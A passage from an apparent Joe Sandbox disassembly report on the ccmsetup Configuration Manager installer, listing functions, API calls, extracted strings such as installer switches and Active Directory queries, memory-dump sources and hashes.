                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$::WTSEnumerateSessions( WTS_CURRENT_SERVER_HANDLE, 0, 1, &pSessions, &dwCount)$CCM::Utility::Security::GetUserTokenFromSid$ConvertStringSidToSid(szUserSid, &pSid)$Could not enumerate terminal server sessions, 0x%x$GetElevatedToken(shUserToken, phToken)$GetLoggedOnUserToken(dwSessionId, fGetElevatedToken, phToken, 0)$GetRestrictedToken(shUserToken, phToken)$GetuserTokenFromSid, couldn't find logon session for user sid %s$L'\0' != szUserSid[0]$NULL != *phToken$Tkw$User sid %s is invalid.$phToken$szUserSid
                                                                                          • API String ID: 1504759256-1784351800
                                                                                          • Opcode ID: d8da3fc01754dfe55e2ef72efee8137ba5cc6dc8919acd453b9fbbf89e459bdf
                                                                                          • Instruction ID: 665219ddb76970ad70e426ff7c45ffb14e963a9f6869ccba940f71800b3e3680
                                                                                          • Opcode Fuzzy Hash: d8da3fc01754dfe55e2ef72efee8137ba5cc6dc8919acd453b9fbbf89e459bdf
                                                                                          • Instruction Fuzzy Hash: BFD1D0B0D40258BADF10DBA0DD4AFEE7EB6AF51B54F188014F508B72C1DBB84A85CB50
                                                                                          Function 005A512E Relevance: 101.9, APIs: 10, Strings: 48, Instructions: 418threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A5138
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005AA3D1: __EH_prolog3_catch.LIBCMT ref: 005AA3D8
                                                                                            • Part of subcall function 005AA3D1: GetCurrentThreadId.KERNEL32 ref: 005AA471
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A520C
                                                                                            • Part of subcall function 005AA3D1: GetCurrentThreadId.KERNEL32 ref: 005AA4FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5271
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5317
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5379
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A54BD
                                                                                            • Part of subcall function 005AA98E: SysFreeString.OLEAUT32(00000000), ref: 005AA9BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A53DC
                                                                                            • Part of subcall function 005AB8A2: __EH_prolog3_catch_GS.LIBCMT ref: 005AB8AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5437
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A555D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A56B9
                                                                                          Strings
                                                                                          • Identifier, xrefs: 005A51CF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5374
                                                                                          • manifest.cpp, xrefs: 005A5261
                                                                                          • manifest.cpp, xrefs: 005A5279
                                                                                          • manifest.cpp, xrefs: 005A54AD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A54B8
                                                                                          • manifest.cpp, xrefs: 005A56C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5432
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A56B4
                                                                                          • manifest.cpp, xrefs: 005A554D
                                                                                          • Failed to discover MSI item. Error 0x%x, xrefs: 005A572D
                                                                                          • !sIdentifier.empty(), xrefs: 005A5267
                                                                                          • UseUpgradeCode, xrefs: 005A52D6
                                                                                          • RunVersionComparison( sOperator, sInstalledVersion, sVersion, bResult ), xrefs: 005A56AF
                                                                                          • spNode.selectNode(c_szXML_Item_Discovery_Property_Version_Query, &spResultNode, false), xrefs: 005A536F
                                                                                          • manifest.cpp, xrefs: 005A53E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5558
                                                                                          • true, xrefs: 005A545C
                                                                                          • manifest.cpp, xrefs: 005A5427
                                                                                          • manifest.cpp, xrefs: 005A56A9
                                                                                          • spNode.getAttribute(c_szXML_Item_Discovery_UseUpgradeCodeAttr, sUseUpgradeCode), xrefs: 005A530D
                                                                                          • spResultNode.getAttribute(c_szXML_Item_Discovery_Property_OperatorAttr, sOperator), xrefs: 005A542D
                                                                                          • CheckProductInstalled( sIdentifier, bInstalled, sInstalledVersion ), xrefs: 005A5553
                                                                                          • manifest.cpp, xrefs: 005A531F
                                                                                          • spResultNode.getText(sVersion), xrefs: 005A53D2
                                                                                          • Property[@Name='Version'], xrefs: 005A5336
                                                                                          • manifest.cpp, xrefs: 005A51FC
                                                                                          • GetProductInstalledByUpgradeCode( sIdentifier, bInstalled, sInstalledVersion ), xrefs: 005A54B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A526C
                                                                                          • Ccmsetup.xml node missing required attribute: Identifier, xrefs: 005A52A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5312
                                                                                          • manifest.cpp, xrefs: 005A5565
                                                                                          • CcmSetupManifest::DiscoverMSIItem, xrefs: 005A51AA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5207
                                                                                          • Couldn't find a product with MSI product code '%s' in the MSI database., xrefs: 005A55AB
                                                                                          • manifest.cpp, xrefs: 005A53CC
                                                                                          • manifest.cpp, xrefs: 005A54C5
                                                                                          • Checking '%s' version '%s' expecting %s '%s'., xrefs: 005A5658
                                                                                          • manifest.cpp, xrefs: 005A5369
                                                                                          • spNode.getAttribute(c_szXML_Item_Discovery_IdentifierAttr, sIdentifier), xrefs: 005A5202
                                                                                          • H&l, xrefs: 005A532A
                                                                                          • Operator, xrefs: 005A53F2
                                                                                          • manifest.cpp, xrefs: 005A5214
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A53D7
                                                                                          • manifest.cpp, xrefs: 005A5381
                                                                                          • Couldn't find a product with MSI upgrade code '%s' in the MSI database., xrefs: 005A5513
                                                                                          • manifest.cpp, xrefs: 005A543F
                                                                                          • manifest.cpp, xrefs: 005A5307
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_$FreeH_prolog3_catchString
                                                                                          • String ID: !sIdentifier.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::DiscoverMSIItem$Ccmsetup.xml node missing required attribute: Identifier$CheckProductInstalled( sIdentifier, bInstalled, sInstalledVersion )$Checking '%s' version '%s' expecting %s '%s'.$Couldn't find a product with MSI product code '%s' in the MSI database.$Couldn't find a product with MSI upgrade code '%s' in the MSI database.$Failed to discover MSI item. Error 0x%x$GetProductInstalledByUpgradeCode( sIdentifier, bInstalled, sInstalledVersion )$H&l$Identifier$Operator$Property[@Name='Version']$RunVersionComparison( sOperator, sInstalledVersion, sVersion, bResult )$UseUpgradeCode$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$spNode.getAttribute(c_szXML_Item_Discovery_IdentifierAttr, sIdentifier)$spNode.getAttribute(c_szXML_Item_Discovery_UseUpgradeCodeAttr, sUseUpgradeCode)$spNode.selectNode(c_szXML_Item_Discovery_Property_Version_Query, &spResultNode, false)$spResultNode.getAttribute(c_szXML_Item_Discovery_Property_OperatorAttr, sOperator)$spResultNode.getText(sVersion)$true
                                                                                          • API String ID: 1919931159-2590330973
                                                                                          • Opcode ID: 092fe4a59146cb5b3b6646453a3d558f68ebe9df227c68cc3fe2ec5a5752c5b4
                                                                                          • Instruction ID: cf3312efa1654155a251a5aed62e84c0c89b162573c4eb8b5edaf3fc737b8591
                                                                                          • Opcode Fuzzy Hash: 092fe4a59146cb5b3b6646453a3d558f68ebe9df227c68cc3fe2ec5a5752c5b4
                                                                                          • Instruction Fuzzy Hash: 22F19F71D40268AADF21DBA0CC0AFAE7EB9FF56704F154089E40977282D7745A45CB62
                                                                                          Function 00595403 Relevance: 98.4, APIs: 8, Strings: 48, Instructions: 376COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0059540A
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005BA3B9: __EH_prolog3_GS.LIBCMT ref: 005BA3C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_H_prolog3_catch_
                                                                                          • String ID: !sValue.empty()$!sValue.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/BITSPriority:$/alwaysexcludeupgrade:$/downloadtimeout:$/excludefeatures:$/forcereboot$/log:$/logon$/nostart$/qf$/qr$/skipprereq:$/skipsignchecks$/usepkicert$CcmSetup::ParseCommonSwitches$FOREGROUND$HIGH$LOW$NORMAL$Unknown BITS priority '%s'. Setting priority to normal.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$sValue.empty() == false$sValue.empty() == false$sValue.tokenize(c_szOption_Separator, m_arrExcludeFeatures)$sValue.tokenize(c_szOption_Separator, m_arrSkipPreReqs)$true
                                                                                          • API String ID: 3654751754-2284400073
                                                                                          • Opcode ID: d49b526af7b19b376c8962b302bbf9df8181545665bae5ebc7fbabc4407b8c2b
                                                                                          • Instruction ID: dd2d0410a6e3a62d004a57bb0fa791670b728e76659d98b30c8457d40327e038
                                                                                          • Opcode Fuzzy Hash: d49b526af7b19b376c8962b302bbf9df8181545665bae5ebc7fbabc4407b8c2b
                                                                                          • Instruction Fuzzy Hash: 11D1DF70A8074AEADF12DBA4CD06EFDBFB5BF21700F154019F511AA182FB646A59CB90
                                                                                          Function 00644364 Relevance: 86.1, APIs: 9, Strings: 40, Instructions: 320threadtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064436E
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644455
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064455B
                                                                                            • Part of subcall function 0060CD0A: __EH_prolog3_catch.LIBCMT ref: 0060CD11
                                                                                            • Part of subcall function 0060CD0A: GetCurrentThreadId.KERNEL32 ref: 0060CD6D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006445B1
                                                                                            • Part of subcall function 0060C8DD: __EH_prolog3_catch.LIBCMT ref: 0060C8E4
                                                                                            • Part of subcall function 0060C8DD: GetCurrentThreadId.KERNEL32 ref: 0060C940
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006445FE
                                                                                          • GetSystemTime.KERNEL32(00000000,InInternet,0000000B,00000001,InInternet,00000001,ClientInfo=@,00000000,00000000,root\ccm,00000001,00000000,00000000,CCM::LocationServices::LSGetInternetMode,000000AC,0063CB01), ref: 00644614
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064465A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006446A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006444D3
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$SystemTime
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetInternetMode$ClientInfo=@$InInternet$InInternet$InInternet$InInternet$InternetModeLastUpdateTime$LSGetInternetMode$LSGetInternetMode: In Internet$LSGetInternetMode: In Intranet$LSGetInternetMode: Unknown$root\ccm$spNS.Get(L"ClientInfo=@", &spObject)$spNS.Open(L"root\\ccm")$spNS.PutInstance(spObject)$spObject.SetBoolean(L"InInternet", false)$spObject.SetBoolean(L"InInternet", true)$spObject.SetDateTime(L"InternetModeLastUpdateTime", stNow)$spObject.SetNull(L"InInternet", CIM_BOOLEAN)
                                                                                          • API String ID: 2877923578-1579399194
                                                                                          • Opcode ID: 534d64c788704968708c4027ba9586610c619c9900b4e936949e6ddde994a595
                                                                                          • Instruction ID: 112e88faa21f05e6c4d15dc145ae691c97f5dd936c92c2f78536088467a410ea
                                                                                          • Opcode Fuzzy Hash: 534d64c788704968708c4027ba9586610c619c9900b4e936949e6ddde994a595
                                                                                          • Instruction Fuzzy Hash: 3CB1D970940368AADF20EFA0DD4ABEE7E66FF52B04F144049F505AB382DB785A85CB51
                                                                                          Function 0064824B Relevance: 81.0, APIs: 8, Strings: 38, Instructions: 470threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00648255
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064839E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648495
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648509
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648622
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648684
                                                                                            • Part of subcall function 00643E06: __EH_prolog3_catch_GS.LIBCMT ref: 00643E0D
                                                                                            • Part of subcall function 00643E06: GetCurrentThreadId.KERNEL32 ref: 00643EA4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006486FF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648879
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064867F
                                                                                          • LSGetSiteVersionFromAD : Attempting to query AD for MPs for site '%s', xrefs: 00648430
                                                                                          • LSGetSiteVersionFromAD : Successfully retrieved version '%s' for site '%s', xrefs: 00648775
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064861D
                                                                                          • ..\lsad.cpp, xrefs: 00648885
                                                                                          • msSMSCapabilities, xrefs: 00648298, 006485BC
                                                                                          • !sSiteCode.empty(), xrefs: 00648394
                                                                                          • ..\lsad.cpp, xrefs: 0064862E
                                                                                          • ..\lsad.cpp, xrefs: 006483AA
                                                                                          • ..\lsad.cpp, xrefs: 006484F9
                                                                                          • Version, xrefs: 0064869A
                                                                                          • ..\lsad.cpp, xrefs: 00648690
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648504
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648399
                                                                                          • GetStringFromColumn(&col, sCliOpSetting), xrefs: 00648618
                                                                                          • ..\lsad.cpp, xrefs: 00648485
                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszMPAttr, dwMPCount, sMPSearchFilter ), xrefs: 0064848B
                                                                                          • ..\lsad.cpp, xrefs: 00648612
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006486FA
                                                                                          • hr = spSearch->GetNextRow(hSearch), xrefs: 0064886F
                                                                                          • ..\lsad.cpp, xrefs: 00648869
                                                                                          • LSGetSiteVersionFromAD : Failed to retrieve version for the site '%s' (0x%08x), xrefs: 006488FE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648874
                                                                                          • ..\lsad.cpp, xrefs: 00648515
                                                                                          • LSGetElementTextFromXML( sCliOpSetting, L"Version", sSiteVersion), xrefs: 006486F5
                                                                                          • ..\lsad.cpp, xrefs: 0064870B
                                                                                          • LSGetSiteVersionFromAD, xrefs: 00648360
                                                                                          • LSGetSiteVersionFromAD : No MPs found for the site '%s'. Assuming SMS 2003 Site., xrefs: 0064854B
                                                                                          • ..\lsad.cpp, xrefs: 006484A1
                                                                                          • ..\lsad.cpp, xrefs: 00648674
                                                                                          • ..\lsad.cpp, xrefs: 0064838E
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 006484FF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648490
                                                                                          • ..\lsad.cpp, xrefs: 006486EF
                                                                                          • (&(ObjectCategory=mSSMSManagementPoint)(mSSMSSiteCode=, xrefs: 006483D0
                                                                                          • LSGetCapabilitiesAndADMembershipFromCliOpSettings(sCliOpSetting, sCapabilities, sNull, sNull), xrefs: 0064867A
                                                                                          • CCM::LocationServices::LSGetSiteVersionFromAD, xrefs: 006482D3
                                                                                          • distinguishedName, xrefs: 0064828E, 00648450
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: !sSiteCode.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(&(ObjectCategory=mSSMSManagementPoint)(mSSMSSiteCode=$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetSiteVersionFromAD$GetStringFromColumn(&col, sCliOpSetting)$LSGetCapabilitiesAndADMembershipFromCliOpSettings(sCliOpSetting, sCapabilities, sNull, sNull)$LSGetElementTextFromXML( sCliOpSetting, L"Version", sSiteVersion)$LSGetSiteVersionFromAD$LSGetSiteVersionFromAD : Attempting to query AD for MPs for site '%s'$LSGetSiteVersionFromAD : Failed to retrieve version for the site '%s' (0x%08x)$LSGetSiteVersionFromAD : No MPs found for the site '%s'. Assuming SMS 2003 Site.$LSGetSiteVersionFromAD : Successfully retrieved version '%s' for site '%s'$LSPerformADQuery( spCont, spSearch, hSearch, pszMPAttr, dwMPCount, sMPSearchFilter )$Version$distinguishedName$hr = spSearch->GetFirstRow(hSearch)$hr = spSearch->GetNextRow(hSearch)$msSMSCapabilities
                                                                                          • API String ID: 133077043-3276868726
                                                                                          • Opcode ID: af8e5bb15ec0a33ae65b26b15d1643ccc3c3444152ee67ec2277af0c2414ecf5
                                                                                          • Instruction ID: aa416c2f892e810fe39289c9dc73ddbf3152b7eebedb33051dcaa68ea5c66970
                                                                                          • Opcode Fuzzy Hash: af8e5bb15ec0a33ae65b26b15d1643ccc3c3444152ee67ec2277af0c2414ecf5
                                                                                          • Instruction Fuzzy Hash: 9D028D70D04219AEDF20EBA4CD49BEDBBBABF40714F144199E608B7282DB745A44CFA1
                                                                                          Function 005A234D Relevance: 77.3, APIs: 3, Strings: 41, Instructions: 343threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A2357
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F556D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A24D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A255F
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005BA4EE: __EH_prolog3_GS.LIBCMT ref: 005BA4F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/PerformUpgrade$/UpgradePackageVersion:$/UpgradeWinTask$/autoupgrade$/forceinstall$/forcereboot$/mp:$/native$/native:$/noservice$/runservice$/service$/source:$/status:$/upgradetolatest$/usepkicert$/useronly$CCMCERTID$CCMCERTISSUERS$CCMCERTSEL$CCMCERTSTORE$CCMFIRSTCERT$CCMHOSTNAME$CCMHTTPPORT$CCMHTTPSCERTNAME$CCMHTTPSPORT$CSetupEnvironment::ParseAutoUpgradeCommandLine$Ccmsetup is launched by Windows Task Scheduler for client upgrade.$Ccmsetup is launched by the local policy for performing upgrade at the service window.$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$FSP$IsClientInstalled(bInstalled, bV4ClientInstalled)$SMSMP$SMSSITECODE$SMSSLP$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp
                                                                                          • API String ID: 2516659302-3445044751
                                                                                          • Opcode ID: 28f50586e297705c7cbd3fdb74950759f059dcaf99cabf07966f18389883b671
                                                                                          • Instruction ID: 0a1d76ab577e7b6277d6abb7cec6b79da702530c072b7fb5c055f28e4cb5c94d
                                                                                          • Opcode Fuzzy Hash: 28f50586e297705c7cbd3fdb74950759f059dcaf99cabf07966f18389883b671
                                                                                          • Instruction Fuzzy Hash: D3B1D270A852997ADF24A7A48D8FFFE6E5AEF43754F14804CF104AB5C3CAE41A44C762
                                                                                          Function 005A4394 Relevance: 75.6, APIs: 7, Strings: 36, Instructions: 372threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A439E
